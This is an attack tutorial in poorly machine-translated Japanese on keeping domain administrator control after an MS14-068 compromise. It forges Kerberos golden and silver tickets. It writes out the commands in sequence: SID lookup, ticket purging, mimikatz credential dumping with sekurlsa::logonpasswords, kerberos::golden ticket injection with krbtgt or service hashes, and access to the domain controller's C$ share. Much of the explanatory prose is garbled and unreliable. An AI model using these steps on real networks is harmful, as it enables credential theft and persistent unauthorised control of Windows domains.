序文
私たちは、ドメインアカウントのパスワードの制御を取得した後、パスワードが変更されないようにするには、私たちが作ってきたことを、ドメインコントローラの特権を維持するための権限を維持する必要があります
特定のドメインコントローラアカウントのパスワードジャンプ方法を取得するにはここをクリック
メモドメイン検証プロセス
1.まず、サーバASにプレーンテキストのパスワード、サーバは、私たちに与えたTGT AS
2.サーバーTGS、TGSサーバは、私たちに与えたSTのアクセスにTGTを取った
対応するサービスへのアクセスを得るために3. STを
制御を維持するためにドメイン権限 - ゴールド注意事項
入門
Ms14068の脆弱性原理は、ドメイン管TGTを偽造し、法案の原則の脆弱性が偽造金のkrbtgtユーザーの法案で、KRBTGTユーザードメインは、ユーザーの発行チケットを管理するために使用され、ユーザーの許可、することができます偽のシステムと任意のユーザ
前提
MS-14から068に成功した後、偽造手形
プロセス
ドメイン名の取得1.:.COMをプラスあなたはwhoamiを後に得ることができます
2.ドメインのSID値を取得します(最終の除去 - 4一般ユーザー領域は、SIDのUIDです)
whoami /all
3.ドメインアカウントKRBTGT NTLMパスワードハッシュ値またはAES-256取得し
、エクスポートドメインのハッシュに表示14068偽造手形をここでジャンプをクリックしてください
4.クリーン全ての紙幣
klist purge
5.ユーザがmimikatz偽造ノートを指定してメモリ内に注入します
kerberos::golden /admin:要伪造的用户名 /domain:域名 /sid:写sid /krbtgt:写krbtgt的hash值 /ptt
リモート6.直接接続
dir \\dc\c$
ドメイン制御を維持する権限 - シルバーノート
入門
銀法案は偽造ST(チケット)である一方、法案の原理にシルバーとゴールドms14068法案は、同じ、ms14068金ノートがある偽造TGT(チケット発行されたチケット)ではありません、この利点は、KDC後にチケットがないので、より多くのなどCIFS(ファイル共有サービス)、MSSQL、WinRMの(Windowsリモート管理)、DNS、としてのみのサービスの仕事の一部に隠された、しかし、偽造チケット、
前提
MS-14から068に成功した後、偽造手形
利用
ドメイン名の取得1.:.COMをプラスあなたはwhoamiを後に得ることができます
2.取得ドメインSID(最終の除去 - 4一般ユーザー領域は、SIDのUIDです)
whoami /all
ターゲットサーバFQDNを攻撃するには、Get 3.
net time /domain 获取域控名
4.ファイル共有サービスのCIFSを使用して、サービスへのアクセスはNTMLHASHアカウント
ms14068に基づいて(ドメインコントローラ名$はサービスアカウントです)mimikatzクロールパスワードを使用
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >2.txt
5.偽のユーザー名を検索するには
net user /domain
全ての紙幣アップ6.クリーン
klist purge
メモリ注射を指定7. mimikatz偽造手形及びユーザー
kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服务账号NTMLHASH /user:用户名 /ptt
リモートDCに直接接続した後、8
dir \\dc\c$